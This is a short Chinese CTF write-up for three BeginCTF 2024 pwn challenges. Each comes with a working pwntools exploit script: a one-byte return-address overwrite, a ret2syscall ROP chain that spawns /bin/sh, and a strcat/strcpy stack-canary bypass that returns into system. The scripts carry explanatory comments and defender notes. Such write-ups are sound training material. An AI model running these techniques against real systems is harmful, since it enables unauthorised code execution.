
BeginCTF 2024 Pwn部分wp

本Pwn小白实力不允许,只写出了几道稍微简单点的

one_byte

溢出只能覆盖返回地址的一个字节,利用溢出,修改返回地址返回主函数继续读出flag

from pwn import *
from struct import pack
from LibcSearcher import *
from ae64 import AE64
import base64
from ctypes import *

# Target selection: debug=1 runs the challenge binary locally, otherwise the
# script connects to the listener at 0.0.0.0:8888. Both branches also load a
# libc ELF, but nothing below uses `libc`, `elf` or `libcc` — they read as
# leftovers from a shared exploit template.
debug = 0
if debug:
    p = process('/home/feichai/ctf_file/pwn')
    libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
else:
    p = remote('0.0.0.0', 8888)
    libc=ELF("/home/feichai/ctf_file/libc.so.6")

#context(arch="amd64",os="linux",log_level="debug")
# NOTE(review): the local process path is .../pwn while the ELF is loaded from
# .../chal — one of the two is probably stale; confirm which file is the target.
elf=ELF("/home/feichai/ctf_file/chal")
libcc=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")

def pwn():
    """Collect the flag one byte per round from the one_byte challenge.

    According to the writeup the overflow reaches only the low byte of the
    saved return address. Each round takes the single flag byte the program
    prints after "your gift: ", then answers the "result?" prompt with 17
    filler bytes followed by 0x63 — the replacement low byte that is meant to
    return execution into main so the next byte gets printed. The loop runs
    100 rounds unconditionally and prints whatever was collected; if the
    remote side closes earlier, recvuntil is expected to raise EOFError and
    the partial flag is never printed.

    Defender note: a bounds check on the read (or a canary between the buffer
    and the return address) removes this primitive; a one-byte partial
    overwrite is not stopped by ASLR because page-granular randomisation
    leaves the low byte of a code address fixed.
    """
    flag = ''
    for i in range(100):
        p.recvuntil(b"your gift: ")
        flag += p.recv(1).decode()
        # 17 filler bytes then the one-byte overwrite. 0x63 comes from the
        # writeup and is specific to this binary's layout — TODO confirm
        # against the disassembly if the challenge is rebuilt.
        pd = b'\x90' * 17 + b'\x63'
        p.sendafter(b"result?",pd)

    print(flag)

if __name__=='__main__':
    # Only run the exploit when executed as a script, not on import.
    pwn()

gift_rop

gadget都留着,直接ret2syscall就可以get shell,因为关闭了标准输出和标准错误,重定向就可以看到输出

from pwn import *
from struct import pack
from LibcSearcher import *
from ae64 import AE64
import base64
from ctypes import *

# Target selection: debug=1 runs gift_rop locally, otherwise connect to the
# listener at 0.0.0.0:8888. `libc` and `libcc` are loaded but not used by the
# chain below (the chain is pure ret2syscall, no libc addresses needed).
debug = 0
if debug:
    p = process('/home/feichai/ctf_file/gift_rop')
    libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
else:
    p = remote('0.0.0.0', 8888)
    libc=ELF("/home/feichai/ctf_file/libc.so.6")

context(arch="amd64",os="linux",log_level="debug")
elf=ELF("/home/feichai/ctf_file/gift_rop")
libcc=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")

# Gadget and data addresses, hard-coded from the challenge binary. Fixed
# 0x4xxxxx addresses imply the binary is not position-independent — confirm
# with checksec before reusing these elsewhere. `ret` is defined but unused.
binsh = 0x00000000004c50f0
pop_rdi = 0x0000000000401f2f
pop_rsi = 0x0000000000409f9e
syscall = 0x401CE4
pop_rdx_rbx =0x000000000047f20b
ret = 0x000000000043d1d0
# The string literal below is the author's gadget inventory (a bare string
# expression, kept as-is); the three assignments after it pick from it.
'''
0x000000000040239e : xor eax, eax ; ret
0x00000000004019d6 : add eax, 1 ; ret
0x0000000000471268 : add eax, 2 ; ret
0x0000000000471281 : add eax, 3 ; ret
'''
xor_eax = 0x000000000040239e
add_eax_3= 0x0000000000471281
add_eax_2= 0x0000000000471268
def pwn():
    """Send the ret2syscall chain for gift_rop and hand over the session.

    The chain sets up execve(2): rdi -> the "/bin/sh" string in the binary,
    rsi = 0, rdx = 0 (the gadget also pops rbx, hence the second 0), and eax
    is built as 0 + 3*19 + 2 = 59 because no gadget loads rax directly. The
    writeup notes the program closes stdout and stderr, so after the shell
    starts `exec 1>&0` points its stdout at the still-open fd 0 (the socket)
    to make output visible.

    Defender note: the chain only works because the binary leaves a usable
    syscall gadget and a writable-free way to reach execve; seccomp or a
    non-executable-stack-plus-canary build would have blocked this route.
    """
    #execve 59 eax = 59 rdi = "/bin/sh\x00" rsi = 0 rdx = 0
    pd = b'\x90'*0x28                          # filler up to the saved return address
    pd += p64(pop_rdi) + p64(binsh)            # rdi = "/bin/sh"
    pd += p64(pop_rdx_rbx) + p64(0) + p64(0)   # rdx = 0 (rbx = 0, discarded)
    pd += p64(pop_rsi) + p64(0)                # rsi = 0
    pd += p64(xor_eax)                         # eax = 0
    pd += p64(add_eax_3) * 19                  # eax = 57
    pd += p64(add_eax_2)                       # eax = 59 (SYS_execve)

    pd += p64(syscall)

    p.sendafter(b"checkin problem.",pd)
    sleep(0.1)
    # stdout/stderr were closed by the program (per the writeup); redirect
    # stdout onto fd 0 so the shell's output comes back over the connection.
    p.sendline(b'exec 1>&0')

    p.interactive()

if __name__=='__main__':
    # Only run the exploit when executed as a script, not on import.
    pwn()

cat

strcat会在字符串后面继续添加字符串,strcpy在复制字符串后会自动加'\0',利用这两个特性,在vul函数中先将canary的最低位字节\x00覆盖掉,然后strcat就可以绕过canary修改返回地址,最后strcpy会将canary最后一字节恢复为\x00,程序结束返回system

from pwn import *
from struct import pack
from LibcSearcher import *
from ae64 import AE64
import base64
from ctypes import *

# Target selection: debug=1 runs the challenge binary locally, otherwise
# connect to the listener at 0.0.0.0:8888. `libc`, `elf` and `libcc` are loaded
# but unused below — template leftovers.
debug = 0
if debug:
    p = process('/home/feichai/ctf_file/pwn')
    libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
else:
    p = remote('0.0.0.0', 8888)
    libc=ELF("/home/feichai/ctf_file/libc.so.6")

context(arch="amd64",os="linux",log_level="debug")
elf=ELF("/home/feichai/ctf_file/chal")
libcc=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")

# Return target used as the new saved return address. The name says `system`,
# but 0x4011FE is an address inside the challenge binary, so presumably it is
# a wrapper or call site that reaches system — confirm in the disassembly.
# `ret` is defined but unused.
system = 0x4011FE
ret = 0x000000000040101a

def pwn():
    """Drive the three "read:" prompts of the cat challenge, then interact.

    The writeup's idea: the first read overwrites the canary's low 0x00 byte
    so that strcat treats the canary as part of the string and appends past
    it, placing the new return address; the later strcpy re-terminates the
    string, restoring the canary's low byte to 0x00 so the check still passes
    and the function returns into `system`. Which of the three sends performs
    which step is not visible from this script alone — TODO confirm against
    the vul() disassembly; the lengths (2, 0x18, 0x39) are layout-specific.

    Defender note: the bypass relies on the canary's terminating NUL being
    clobbered by string routines; bounded copies (strncpy/strlcpy with the
    real buffer size) or avoiding strcat on attacker-controlled data closes it.
    """
    pd = b'a' * 2 + p64(system)   # 2 bytes of filler, then the return target
    p.sendafter(b"read:",pd)
    pd = b'a' * 0x18              # 24-byte filler string
    p.sendafter(b"read:",pd)
    pd = b'a' * 0x39              # 57-byte filler string
    p.sendafter(b"read:",pd)

    p.interactive()

if __name__=='__main__':
    # Only run the exploit when executed as a script, not on import.
    pwn()

